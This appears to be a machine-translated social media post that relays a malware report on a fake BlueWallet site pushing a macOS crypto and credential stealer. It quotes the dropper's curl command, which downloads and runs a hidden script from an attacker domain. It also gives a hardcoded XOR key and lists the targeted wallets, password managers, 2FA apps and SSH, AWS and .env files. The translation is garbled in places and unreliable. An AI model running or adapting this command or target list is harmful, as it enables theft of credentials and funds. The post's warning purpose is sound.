Crypto Beware Fake BlueWallet Stealing Crypto Coin

Krypto residents beware of fake BlueWallet, theft of Krypto coins, passwords and accounts on macOS

According to a report by the official website of the developer of the popular anti-malware tool, Malwarebytes mentioned a malware distribution campaign that claimed to be a Krypto Currency wallet called BlueWallet, which was actually an evolving bag but was used by hackers behind the malware impersonation as an intermediary to release malware into the victim's machine to be used to steal data and money on the victim's Krypto Currency wallet, as well as other information such as passwords saved on the machine, data on the web browser, file documents on the victim's machine, and other sensitive information, this time in focus. Target to a particular group of users of the macOS operating system.

For the part of the campaign, hackers deceive victims by means of social engineering. They deceive victims into a fake BlueWallet website with the URL of updating-bluewallet [.] com (while the real thing is bluewallet [.] io). The website is almost exactly similar to the website of BlueWallet. Many people do not notice that it is a fake website. The website will not ask for consent before downloading the BlueWallet Installer file. Applescript into the download folder on the victim's machine within 2 seconds of the victim entering the website (which will be downloaded again if the victim does. Click one of the two buttons that appear on the website. The insidious thing is that the file is not a typical Binary file, but a file containing an Apple Script script, keeping it from being quarantine by macOS protection.

In the process of installing the first malware in the fake wallet stain, it starts with a deceptive website that allows the victim to open the Script Editor to run the malware script by telling the victim to press the Play button or the 11.4R button to open the application. The script in the file claims to install the wallet. When the decoded, it will be the script to download the next malware file (payload) without the victim's knowledge. This command will look like this:

Curl -s' https: / / projects2026box [.] com / serve _ site / confighelper_0adfeee8.sh '-o / tmp / .sysupd.sh & chmod + x / tmp / .sysupd.sh & / tmp / .sysupd.sh > / dev / null 2 > & 1 &

A file with the .sysupd.sh genus will fake the file as a file for general updates. When the Payload is embedded on the machine, the umask 077 command is used to assign the right for the malware created to be visible only to the victim user (Compromise User). This prevents the use of other users' names to analyze the malware. The malware will run under a temporary folder named / tmp. This is created from / dev / urandom in the Configuration section. It is also used to bore the Obfuscation. It is not as smooth as other malware. The _ xd function will read two Hex strings at a time and decode XOR encrypted bytes per byte using a key that is fixed (Hardcoded) as swckR9JCD2Uu.

Such decoding will decode the Telegram Bot's Token acting as a control server (C2 or Command and Control), Chat Identifier, Token for 2nd Control, and URL for use during Runtime. In addition, the decoding system is also used to decode commands received from bots on Telegram.

For the information that this malware can steal, there are many categories, such as

Data on web browsers, by supporting the theft of data from multiple web browsers, e.g.

The Chromium family, which will cover Google Chrome, Brave, Microsoft Edge, Vivaldi, Opera, Opera GX, Arc, Chromium, Coccoc, and Yandex.

Firefox families such as Firefox, Waterfox, Pale Moon, Zen, and LibreWolf.

And macOS's own web browser, Safari, can steal data such as cookies files, form data, and history.

Crypto Wallet, which covers many types of bags such as

Desktop (Desktop) pocket applications such as Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.

Web browser add-on bags (extensions) such as Xverse, Leather, UniSat, Alby, Wizz, Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, Slope, MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, XDEFI, Keplr, Station, Cosmostation, Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple.

Data on Password Manager, such as

1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup

Data of 2-layer authentication tools (2FA or 2 Factors Authentication), e.g.

Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP

Applications for chat, such as

Telegram Desktop and Discord (Covers Discord Canary and Discord PTB)

Common applications as web browser add-ons, e.g.

Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.

Systems for software development and cloud systems such as

The settings file of the AWS cloud in the .aws file format.

SSH key file genus .ssh

GnuPG key file genus .gnupg

Kubernetes setup file genus .kube

Shell and Git files genus .zshrc, .zsh _ history, .bash _ history, and .gitconfig

And general data files on the victim's machine covering the following genera:

.txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env,

# Trending # Lemon 8 Howtoo # lemon 8 diary # Bluewallet # freedomhack